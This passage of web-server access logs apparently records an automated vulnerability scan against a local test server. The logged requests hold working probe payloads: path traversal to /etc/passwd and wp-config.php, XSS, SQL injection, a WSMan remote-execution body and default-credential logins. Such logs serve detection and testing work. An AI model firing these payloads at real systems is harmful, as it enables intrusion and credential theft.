"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /whoAmI/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/29KBxg01aJ31d5xk5flSTmoNbWk/_/;/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/PWResetUserValidation HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/main.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/..;/css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/force-download.php?file=../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysqldump.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LetsEncrypt/Index?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-----------------------------77916619616724262872902741074\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KBxcbaDSOZcvhGpAQZVrBzVvd.txt\x22\x0D\x0AContent-Type: text/plain\x0D\x0ATest\x0D\x0A-----------------------------77916619616724262872902741074--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(/XSS-form/)%3E&control=upload HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SolarWinds/InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /RDWeb/Pages/en-US/login.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.back%3Cimg%20src=x%20onerror=alert%28document.domain%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger_doc.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/opcache.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /clansphere/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"dir=%2Fetc%2F&onlyFiles=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /7/0/33/1d/www.citysearch.com/search?what=x&where=place%22%3E%3Csvg+onload=confirm(document.domain)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /prweb/PRAuth/app/default/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php-backup HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //https:example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"{\x22username\x22:\x22admin\x22,\x22password\x22:\x22123456\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/user/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mysql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/jh-404-logger/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /InformationService/v3/Json/Query?query=SELECT+Uri+FROM+Orion.Pollers+ORDER+BY+PollerID+WITH+ROWS+1+TO+3+WITH+TOTALROWS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /security/hostSignon.do?hostSignOn=true&servProvCode=k3woq%22%5econfirm(document.domain)%5e%22a2pbrnzx5a9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status%3E%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wsdl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wlsecurity.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?id=nuclei%25{128*128} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%c0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/build.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //http://127.0.0.1example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"username=Administrator&password=versa123&sso=systemRadio","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /versa/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /site.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Nacos-Server", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22option\x22\x0D\x0A\x0D\x0Acom_gmapfp\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22image1\x22; filename=\x22nuclei.html.gif\x22\x0D\x0AContent-Type: text/html\x0D\x0A\x0D\x0Aprojectdiscovery\x0D\x0A\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS\x0D\x0AContent-Disposition: form-data; name=\x22no_html\x22\x0D\x0A\x0D\x0Ano_html\x0D\x0A------WebKitFormBoundarySHHbUsfCoxlX1bpS--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?option=comgmapfp&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /client/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) 